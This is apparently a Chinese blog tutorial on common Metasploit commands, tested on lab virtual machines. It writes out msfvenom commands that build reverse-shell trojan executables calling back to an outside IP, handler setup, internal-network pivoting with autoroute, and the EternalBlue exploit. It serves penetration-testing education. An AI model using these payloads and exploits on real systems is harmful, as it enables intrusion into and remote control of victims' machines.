Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

Metasploit常用操作命令

内网渗透 Adminxe 2980℃ 0评论

0x00 简述

0x01基本操作

1.启动MSF

这里用的是kali里面的msf,需要开启msf依赖的数据库为PostgreSQL:

service postgresql start	# 启动 postgresql数据库
msfconsole	# 启动msf
image

这样就算是启动成功了,左下角会变成msf >

2.配置和生成木马

在kali下用ifconfig查询当前攻击机的ip,用于生成木马和配置监听。

ifconfig	# 查ip
image

当前ip为192.168.184.129。

首先使用msf生成exe木马命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=监听端口 -f exe /位置/test.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.184.129 LPORT=5555 -f exe -o /var/test.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=45.77.249.160 LPORT=6666 -f exe -i 50 -o c:/xx.exe

这里监听5555端口,配置生成木马。监听面板配置命令:

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set LHOST 45.77.249.160 
set LPORT 6666 
exploit

这里开始监听,当木马被运行时,这里会接收到并返回一个meterpreter。

image

3.上线

里我用Windows2008R2虚拟机测试了下上线。

image

成功。

执行列目录ls

image

执行shell操作命令行:

image

回到meterpreter,这里可以继续探测内网。

getuid	# 查看当前用户

可以通过获取网段增加路由的方式对内网环境的其他主机继续探测。

run get_local_subnets	# 获取网段


run autoroute -s 192.168.184.0 -n 255.255.255.0
# 增加路由
run autoroute -p	# 查看路由设置
image
image
image

0x02 使用MSF提权

这里对Windows2008R2虚拟机提权。

1.查找exp

首先需要查找EXP。使用serach命令。

search MS15-051	# 这里直接使用MS15-051

2.利用

这里msf search一直查不到东西。

但是具体流程是选用MS15-051进行提权,再打开一个msf进行监听。查看权限即提权成功。

exploit/windows/local/xxx
set session 10 
exploit

0x03 利用MS17010

1.配置exp

目标机IP:192.168.184.131

系统:windows 2008 R2

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.184.131
set LHOST 45.77.249.160 
set LPORT 6666 
show options
exploit

2.利用

image

配置完目标机直接执行命令exploit

image

成功的话会提示win并且返回一个meterpreter。

成功。

image

转载请注明:Adminxe's Blog » Metasploit常用操作命令

喜欢 (5)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址